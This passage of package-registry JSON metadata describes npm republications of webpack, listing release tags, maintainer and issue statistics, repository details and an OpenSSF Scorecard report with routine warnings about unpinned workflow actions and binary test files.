blished_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:57:50.005Z","dependent_packages_count":9,"downloads":16,"downloads_period":"last-month","dependent_repos_count":5,"rankings":{"downloads":20.758084658839206,"dependent_repos_count":5.0198595178007075,"dependent_packages_count":2.250904144690052,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":5.699923744662702},"purl":"pkg:npm/webpack-legacy","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-legacy","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-legacy","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-legacy/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-legacy/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-legacy/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-legacy/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-legacy/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-legacy/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-legacy/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2022-11-10T21:09:22.495Z","updated_at":"2022-11-10T21:09:22.495Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2621300,"name":"zhufeng-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2018-08-31T14:48:49.678Z","latest_release_published_at":"2018-08-31T14:48:49.678Z","latest_release_number":"4.17.1","last_synced_at":"2026-09-03T00:17:34.924Z","created_at":"2022-04-10T04:23:39.217Z","updated_at":"2026-09-03T00:17:34.925Z","registry_url":"https://www.npmjs.com/package/zhufeng-webpack","install_command":"npm install zhufeng-webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.17.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 